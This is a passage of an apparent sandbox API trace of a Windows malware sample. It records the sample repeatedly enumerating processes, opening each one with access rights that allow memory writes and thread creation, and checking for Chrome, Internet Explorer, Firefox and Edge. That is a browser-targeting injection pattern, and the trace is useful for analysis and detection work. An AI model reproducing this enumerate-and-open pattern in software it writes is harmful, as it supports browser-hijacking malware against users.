	[0237.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7a84
	[0237.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.266] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.266] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.267] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.267] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.268] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7a88
	[0237.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.269] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.270] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.270] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.271] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0237.272] CloseHandle (hObject=0x4fd0) returned 1
	[0237.272] Sleep (dwMilliseconds=0x64) 
	[0237.373] GetCurrentProcessId () returned 0x110
	[0237.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0237.378] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0237.380] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0237.382] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0237.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7a8c
	[0237.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.383] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.383] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.383] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.383] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7a90
	[0237.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.385] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.385] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.385] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.385] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.386] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0237.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7a94
	[0237.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.387] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0237.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.398] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.398] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0237.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.398] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7a98
	[0237.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.399] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.400] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.400] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.400] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0237.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7a9c
	[0237.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0237.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0237.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.403] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.403] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0237.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7aa0
	[0237.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.404] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0237.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.404] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.404] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0237.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.405] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.405] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0237.406] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7aa4
	[0237.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.406] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0237.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.406] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.406] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0237.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.407] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0237.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7aa8
	[0237.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.408] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.408] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.408] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.409] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7aac
	[0237.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.410] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.410] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.410] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.411] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7ab0
	[0237.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.412] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.412] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.412] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.413] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.413] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7ab4
	[0237.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.414] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.414] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.414] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.415] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7ab8
	[0237.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.416] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.416] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.416] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.418] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.418] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7abc
	[0237.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.419] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.420] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.420] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.420] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7ac0
	[0237.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.421] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.422] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.422] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.422] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7ac4
	[0237.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.423] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.424] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.424] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.424] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0237.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7ac8
	[0237.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.425] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0237.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.426] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.426] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0237.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.426] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.427] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7acc
	[0237.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.427] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.428] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.428] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.428] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.429] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0237.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7ad0
	[0237.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.429] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.430] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.430] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.430] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7ad4
	[0237.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.431] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.432] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.432] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.433] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7ad8
	[0237.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.434] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.434] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.434] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.435] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7adc
	[0237.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.436] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.436] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.436] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.437] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.437] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0237.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7ae0
	[0237.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.438] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0237.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.438] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.439] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
